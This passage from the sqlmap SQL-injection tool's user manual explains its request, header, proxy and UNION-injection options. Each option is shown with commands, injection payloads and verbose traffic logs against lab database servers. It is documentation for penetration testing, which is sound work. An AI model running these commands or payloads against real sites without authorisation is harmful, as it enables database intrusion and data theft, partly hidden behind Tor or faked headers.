[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example.php?today=483
|
|
[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:49] [INFO] url is stable
|
|
[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic
|
|
[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic
|
|
[hh:mm:53] [INFO] GET parameter 'today' is dynamic
|
|
[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'
|
|
[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'
|
|
[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'
|
|
[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Testable parameter(s)
|
|
|
|
<p>
|
|
Option: <tt>-p</tt>
|
|
|
|
<p>
|
|
By default sqlmap tests all <tt>GET</tt> parameters, <tt>POST</tt>
|
|
parameters, HTTP <tt>Cookie</tt> header values and HTTP <tt>User-Agent</tt>
|
|
header value for dynamicity and SQL injection vulnerability, but it is
|
|
possible to manually specificy the parameter(s) you want sqlmap to perform
|
|
tests on comma separeted in order to skip dynamicity tests and perform SQL
|
|
injection test and inject directly only against the provided parameter(s).
|
|
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
|
|
-p "id"
|
|
|
|
[hh:mm:48] [INFO] testing connection to the target url
|
|
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:49] [INFO] url is stable
|
|
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
|
|
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
|
|
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
|
|
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
|
|
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
|
|
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
|
|
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Or, if you want to provide more than one parameter, for instance:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
|
|
-p "cat,id"
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also test only the HTTP <tt>User-Agent</tt> header.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 \
|
|
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
|
|
|
|
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
|
|
[hh:mm:40] [INFO] testing connection to the target url
|
|
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:41] [INFO] url is stable
|
|
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
|
|
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
|
|
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
|
|
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
|
|
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
|
|
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
|
|
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
|
|
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
|
|
[hh:mm:41] [INFO] testing MySQL
|
|
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
|
[hh:mm:41] [INFO] retrieved: 44
|
|
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:41] [INFO] confirming MySQL
|
|
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
|
|
[hh:mm:41] [INFO] retrieved: 1
|
|
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
|
[hh:mm:41] [INFO] retrieved: 4
|
|
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP method: <tt>GET</tt> or <tt>POST</tt>
|
|
|
|
<p>
|
|
Options: <tt>--method</tt> and <tt>--data</tt>
|
|
|
|
<p>
|
|
By default the HTTP method used to perform HTTP requests is <tt>GET</tt>,
|
|
but you can change it to <tt>POST</tt> and provide the data to be sent
|
|
through <tt>POST</tt> request. Such data, being those parameters, are
|
|
tested for SQL injection like the <tt>GET</tt> parameters.
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST \
|
|
--data "id=1&cat=2"
|
|
|
|
[hh:mm:53] [INFO] testing connection to the target url
|
|
[hh:mm:53] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:54] [INFO] url is stable
|
|
[hh:mm:54] [INFO] testing if POST parameter 'id' is dynamic
|
|
[hh:mm:54] [INFO] confirming that POST parameter 'id' is dynamic
|
|
[hh:mm:54] [INFO] POST parameter 'id' is dynamic
|
|
[hh:mm:54] [INFO] testing sql injection on POST parameter 'id'
|
|
[hh:mm:54] [INFO] testing numeric/unescaped injection on POST parameter 'id'
|
|
[hh:mm:54] [INFO] confirming numeric/unescaped injection on POST parameter 'id'
|
|
[hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable
|
|
[hh:mm:54] [INFO] testing if POST parameter 'cat' is dynamic
|
|
[hh:mm:54] [WARNING] POST parameter 'cat' is not dynamic
|
|
[...]
|
|
[hh:mm:54] [INFO] testing Oracle
|
|
[hh:mm:54] [INFO] query: LENGTH(SYSDATE)
|
|
[hh:mm:54] [INFO] retrieved: 9
|
|
[hh:mm:54] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:54] [INFO] confirming Oracle
|
|
[hh:mm:54] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
|
[hh:mm:54] [INFO] retrieved: 10.2.0.1.0
|
|
[hh:mm:55] [INFO] performed 76 queries in 0 seconds
|
|
back-end DBMS: Oracle
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP <tt>Cookie</tt> header
|
|
|
|
<p>
|
|
Option: <tt>--cookie</tt>
|
|
|
|
<p>
|
|
This feature can be useful in two scenarios:
|
|
|
|
<itemize>
|
|
<item>The web application requires authentication based upon cookies and
|
|
you have such data.
|
|
<item>You want to test for and exploit SQL injection on such header
|
|
values.
|
|
</itemize>
|
|
|
|
<p>
|
|
The steps to go through in the second scenario are the following:
|
|
|
|
<itemize>
|
|
<item>On Firefox web browser login on the web authentication form while
|
|
dumping URL requests with <htmlurl url="http://tamperdata.mozdev.org/"
|
|
name="TamperData"> browser's extension.
|
|
<item>In the horizontal box of the extension select your authentication
|
|
transaction then in the left box on the bottom click with the right button
|
|
on the <tt>Cookie</tt> value, then click on <tt>Copy</tt> to save its
|
|
value to the clipboard.
|
|
<item>Go back to your shell and run sqlmap.
|
|
</itemize>
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie \
|
|
"id=1;cat=2" -v 1
|
|
|
|
[hh:mm:37] [INFO] testing connection to the target url
|
|
[hh:mm:37] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:38] [INFO] url is stable
|
|
[hh:mm:38] [INFO] testing if Cookie parameter 'id' is dynamic
|
|
[hh:mm:38] [INFO] confirming that Cookie parameter 'id' is dynamic
|
|
[hh:mm:38] [INFO] Cookie parameter 'id' is dynamic
|
|
[hh:mm:38] [INFO] testing sql injection on Cookie parameter 'id'
|
|
[hh:mm:38] [INFO] testing numeric/unescaped injection on Cookie parameter 'id'
|
|
[hh:mm:38] [INFO] confirming numeric/unescaped injection on Cookie parameter 'id'
|
|
[hh:mm:38] [INFO] Cookie parameter 'id' is numeric/unescaped injectable
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that the HTTP <tt>Cookie</tt> header values are separated by a
|
|
<tt>;</tt> character, <bf>not</bf> by an <tt>&</tt>.
|
|
|
|
<p>
|
|
If the web application at first HTTP response has within the HTTP headers
|
|
a <tt>Set-Cookie</tt> header, sqlmap will automatically use it in all HTTP
|
|
requests as the HTTP <tt>Cookie</tt> header and also test for SQL
|
|
injection on these values.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
|
|
|
|
[...]
|
|
[hh:mm:39] [INFO] testing connection to the target url
|
|
[hh:mm:39] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
|
|
Host: 192.168.1.125:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
|
|
Connection: close
|
|
|
|
[...]
|
|
[hh:mm:40] [INFO] url is stable
|
|
[...]
|
|
[hh:mm:40] [INFO] testing if Cookie parameter 'ASPSESSIONIDSABTRCAS' is dynamic
|
|
[hh:mm:40] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
|
|
Host: 192.168.1.125:80
|
|
Cookie: ASPSESSIONIDSABTRCAS=469
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
If you provide an HTTP <tt>Cookie</tt> header value and the target URL
|
|
sends an HTTP <tt>Set-Cookie</tt> header, sqlmap asks you which one to use
|
|
in the following HTTP requests.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" --cookie "id=1"
|
|
|
|
[hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its
|
|
own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie
|
|
values that you provided? [Y/n]
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP <tt>Referer</tt> header
|
|
|
|
<p>
|
|
Option: <tt>--referer</tt>
|
|
|
|
<p>
|
|
It is possible to fake the HTTP <tt>Referer</tt> header value with this
|
|
option. By default no HTTP <tt>Referer</tt> heder is sent in HTTP
|
|
requests.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --referer \
|
|
"http://www.google.com" -v 3
|
|
|
|
[...]
|
|
[hh:mm:48] [INFO] testing connection to the target url
|
|
[hh:mm:48] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/pgsql/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
Referer: http://www.google.com
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP <tt>User-Agent</tt> header
|
|
|
|
<p>
|
|
Options: <tt>--user-agent</tt> and <tt>-a</tt>
|
|
|
|
<p>
|
|
By default sqlmap perform HTTP requests providing the following HTTP
|
|
<tt>User-Agent</tt> header value:
|
|
|
|
<tscreen><verb>
|
|
sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
It is possible to fake it with the <tt>--user-agent</tt> option.
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
|
|
--user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
|
|
|
|
[...]
|
|
[hh:mm:02] [INFO] testing connection to the target url
|
|
[hh:mm:02] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/oracle/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
|
|
Connection: close
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Providing a text file, <tt>./txt/user-agents.txt</tt> or any other
|
|
file containing a list of at least one user agent, to the <tt>-a</tt>
|
|
option, sqlmap will randomly select a <tt>User-Agent</tt> from the file
|
|
and use it for all HTTP requests.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 \
|
|
-a "./txt/user-agents.txt"
|
|
|
|
[hh:mm:00] [DEBUG] initializing the configuration
|
|
[hh:mm:00] [DEBUG] initializing the knowledge base
|
|
[hh:mm:00] [DEBUG] cleaning up configuration parameters
|
|
[hh:mm:00] [DEBUG] fetching random HTTP User-Agent header from file './txt/user-agents.txt'
|
|
[hh:mm:00] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt':
|
|
Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
|
|
[hh:mm:00] [DEBUG] setting the HTTP method to perform HTTP requests through
|
|
[hh:mm:00] [DEBUG] creating HTTP requests opener object
|
|
[hh:mm:00] [DEBUG] parsing XML queries file
|
|
[hh:mm:00] [INFO] testing connection to the target url
|
|
[hh:mm:00] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
|
|
Connection: close
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that the HTTP <tt>User-Agent</tt> header is tested against SQL
|
|
injection also if you do not overwrite the default sqlmap HTTP
|
|
<tt>User-Agent</tt> header value.
|
|
|
|
<p>
|
|
Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
|
|
header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
|
|
not provided, its value is not expected or its value is blocked by a web
|
|
application firewall or similar intrusion prevention system. In this case
|
|
sqlmap will show you a message as follows:
|
|
|
|
<tscreen><verb>
|
|
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
|
|
to force the HTTP User-Agent header with option --user-agent or -a
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications
|
|
|
|
<p>
|
|
Options: <tt>--auth-type</tt> and <tt>--auth-cred</tt>
|
|
|
|
<p>
|
|
These options can be used to specify which HTTP authentication type the
|
|
web server implements and the valid credentials to be used to perfom all
|
|
HTTP requests to the target URL.
|
|
The two valid types are <tt>Basic</tt> and <tt>Digest</tt> and the
|
|
credentials' syntax is <tt>username:password</tt>.
|
|
|
|
<p>
|
|
Examples on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1&cat=2" \
|
|
--auth-type Basic --auth-cred "testuser:testpass" -v 3
|
|
|
|
[...]
|
|
[hh:mm:28] [INFO] testing connection to the target url
|
|
[hh:mm:28] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/basic/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
[...]
|
|
|
|
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1&cat=2" \
|
|
--auth-type Digest --auth-cred "testuser:testpass" -v 3
|
|
|
|
[...]
|
|
[hh:mm:48] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/digest/get_int.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
Authorization: Digest username="testuser", realm="Testing digest authentication",
|
|
nonce="qcL9udlSBAA=f3b77da349fcfbf1a59ba37b21e291341159598f",
|
|
uri="/sqlmap/mysql/digest/get_int.php?id=1&cat=2",
|
|
response="e1bf3738b4bbe04e197a12fb134e13a2", algorithm="MD5", qop=auth, nc=00000001,
|
|
cnonce="df1c0902c931b640"
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>HTTP proxy
|
|
|
|
<p>
|
|
Option: <tt>--proxy</tt>
|
|
|
|
<p>
|
|
It is possible to provide an anonymous HTTP proxy address to pass by the
|
|
HTTP requests to the target URL. The syntax of HTTP proxy value is
|
|
<tt>http://url:port</tt>.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" \
|
|
--proxy "http://127.0.0.1:3128"
|
|
|
|
[hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
[hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
|
|
[hh:mm:37] [WARNING] the back-end DMBS is not MySQL
|
|
[hh:mm:37] [WARNING] the back-end DMBS is not Oracle
|
|
back-end DBMS: PostgreSQL
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Instead of using a single anonymous HTTP proxy server to pass by, you can
|
|
configure a <htmlurl url="http://tor.eff.org" name="Tor client"> together
|
|
with <htmlurl url="http://www.privoxy.org" name="Privoxy"> on your machine
|
|
as explained on the <htmlurl url="http://tor.eff.org/docs/tor-doc-unix.html.en"
|
|
name="Tor client guide"> then run sqlmap as follows:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" \
|
|
--proxy "http://127.0.0.1:8118"
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that <tt>8118</tt> is the default Privoxy port, adapt it to your
|
|
settings.
|
|
|
|
|
|
<sect2>Concurrent HTTP requests
|
|
|
|
<p>
|
|
Option: <tt>--threads</tt>
|
|
|
|
<p>
|
|
It is possible to specify the number of maximum concurrent HTTP requests
|
|
that sqlmap can start when it uses the blind SQL injection technique to
|
|
retrieve the query output.
|
|
This feature relies on the <htmlurl url="http://en.wikipedia.org/wiki/Multithreading"
|
|
name="multithreading"> concept and inherits both its pro and its cons.
|
|
|
|
<p>
|
|
Examples on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 \
|
|
-b --threads 3
|
|
|
|
[...]
|
|
back-end DBMS: MySQL >= 5.0.0
|
|
|
|
[hh:mm:08] [INFO] fetching banner
|
|
[hh:mm:08] [INFO] retrieved the length of query output: 18
|
|
[hh:mm:09] [INFO] query: IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32))
|
|
[hh:mm:09] [INFO] starting 3 threads
|
|
[hh:mm:09] [INFO] retrieved: 5.0.51a-3ubuntu5.2
|
|
[hh:mm:09] [INFO] performed 132 queries in 0 seconds
|
|
banner: '5.0.51a-3ubuntu5.2'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, sqlmap first calculates the length of the query output,
|
|
then starts three threads. Each thread is assigned to retrieve one
|
|
character of the query output. The thread then ends after approximately
|
|
seven HTTP requests, the maximum to retrieve a query output character.
|
|
|
|
|
|
<sect2>Delay in seconds between each HTTP request
|
|
|
|
<p>
|
|
Option: <tt>--delay</tt>
|
|
|
|
<p>
|
|
It is possible to specify a number of seconds to wait between each HTTP
|
|
request. The valid value is a float, for instance 0.5.
|
|
|
|
|
|
<sect1>Techniques
|
|
|
|
<sect2>Test for Time Based Blind SQL injection
|
|
|
|
<p>
|
|
Option: <tt>--time-test</tt>
|
|
|
|
<p>
|
|
TODO
|
|
|
|
|
|
<sect2>Test for UNION query SQL injection
|
|
|
|
<p>
|
|
Option: <tt>--union-test</tt>
|
|
|
|
<p>
|
|
It is possible to test if the target URL is affected by an <bf>inband
|
|
SQL injection</bf> vulnerability.
|
|
Refer to the <em>Techniques</em> section for details on this SQL injection
|
|
technique.
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
|
|
--union-test -v 1
|
|
|
|
[...]
|
|
back-end DBMS: Oracle
|
|
|
|
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
|
|
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
|
|
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
|
|
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&cat=2'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&cat=2" \
|
|
--union-test -v 1
|
|
|
|
[...]
|
|
back-end DBMS: PostgreSQL
|
|
|
|
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
|
|
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
|
|
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
|
|
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&cat=2'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, the target URL parameter <tt>id</tt> might be also
|
|
affected by an inband SQL injection.
|
|
In case this vulnerability is exploitable it is strongly recommended to
|
|
use it.
|
|
|
|
<sect2>Use the UNION query SQL injection
|
|
|
|
<p>
|
|
Option: <tt>--union-use</tt>
|
|
|
|
<p>
|
|
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
|
|
the target URL is affected by an <bf>inband SQL injection</bf>
|
|
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
|
|
exploitable, it will trigger this vulnerability to retrieve the output of
|
|
the <tt>SELECT</tt> queries.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 \
|
|
--union-use --banner
|
|
|
|
[...]
|
|
back-end DBMS: Microsoft SQL Server 2000
|
|
|
|
[hh:mm:42] [INFO] fetching banner
|
|
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
|
|
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
|
|
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
|
|
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
|
|
vulnerability
|
|
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
|
|
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
|
|
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
|
|
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
|
|
banner:
|
|
---
|
|
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
|
Aug 6 2000 00:57:48
|
|
Copyright (c) 1988-2000 Microsoft Corporation
|
|
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
|
|
---
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
|
|
blind SQL injection and exploitable inband SQL injection vulnerabilities.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5 \
|
|
--union-use --banner
|
|
|
|
[...]
|
|
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
|
|
vulnerability
|
|
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
|
|
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
|
|
AND 6043=6043
|
|
[hh:mm:25] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
|
|
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
|
|
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
|
|
06043=6043&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Mon, 28 Jul 2008 22:34:25 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 194
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
|
<tr><td></td><td>blLOjN5.0.51a-3ubuntu5.2zniYyA</td><td></td></tr>
|
|
</table>
|
|
</body></html>
|
|
|
|
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
|
|
banner: '5.0.51a-3ubuntu5.2'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, the MySQL <tt>version()</tt> function (banner) output is
|
|
nested (inband) within the HTTP response page, this makes the inband SQL
|
|
injection exploitable.
|
|
|
|
|
|
<sect1>Injection
|
|
|
|
<sect2>String match
|
|
|
|
<p>
|
|
Option: <tt>--string</tt>
|
|
|
|
<p>
|
|
By default the distinction of a True query by a False one (basic concept
|
|
for standard blind SQL injection attacks) is done comparing injected pages
|
|
content MD5 hash with the original not-injected page content MD5. Not
|
|
always this concept works because sometimes the page content changes at
|
|
each refresh, for instance when the page has a counter, a dynamic
|
|
advertisment banner or any other part of the HTML which is render
|
|
dynamically and might change in time not only consequently to user's
|
|
input.
|
|
To bypass this limit, sqlmap makes it possible to manually provide a
|
|
string which is <bf>always</bf> present on the not-injected page
|
|
<bf>and</bf> on all True injected query pages, but that it is <bf>not</bf>
|
|
on the False ones.
|
|
Such information is easy for an user to retrieve, simply try to inject on
|
|
the affected URL parameter an invalid value and compare original output
|
|
with the wrong output to identify which string is on True page only.
|
|
This way the distinction will be based upon string match and not page MD5
|
|
hash comparison.
|
|
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1&cat=2" \
|
|
-v 5
|
|
|
|
[...]
|
|
[hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
|
|
[hh:mm:50] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int_refresh.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
|
|
